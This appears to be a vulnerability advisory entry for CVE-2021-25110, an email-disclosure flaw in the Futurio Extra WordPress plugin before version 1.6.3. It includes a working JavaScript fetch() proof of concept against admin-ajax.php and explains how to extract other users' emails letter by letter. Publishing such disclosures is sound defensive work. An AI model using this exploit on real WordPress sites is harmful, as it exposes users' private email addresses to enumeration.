Lucene search
Krzysztof ZającWPEX-ID:B655FC21-47A1-4786-8911-D78AB823C153HistoryJan 14, 2022 - 12:00 a.m.
Futurio Extra < 1.6.3 - Subscriber+ User Email Address Disclosure
2022-01-1400:00:00
Krzysztof Zając
91
0.001 Low
EPSS
Percentile
24.8%
The plugin allows any logged in user, such as subscriber, to extract any other user’s email address.
fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded"
},
"body": new URLSearchParams({"action": "dilaz_mb_query_select", "q": "@gma", "query_type": "user"}),
"method": "POST",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
If a given user name appeared in the output list, that means, the user has "@gma" in their e-mail. Then you can extract any user's e-mail letter-by-letter.Related
wpvulndb
wpvulndb
Futurio Extra < 1.6.3 - Subscriber+ User Email Address Disclosure
2022-01-14 00:00:00
prion
prion
Design/Logic Flaw
2022-02-14 12:15:00
cvelist
cvelist
cnvd
cnvd
WordPress Futurio Extra plugin information leakage vulnerability
2022-02-16 00:00:00
patchstack
patchstack
cve
cve
CVE-2021-25110
2022-02-14 12:15:15
nvd
nvd
CVE-2021-25110
2022-02-14 12:15:15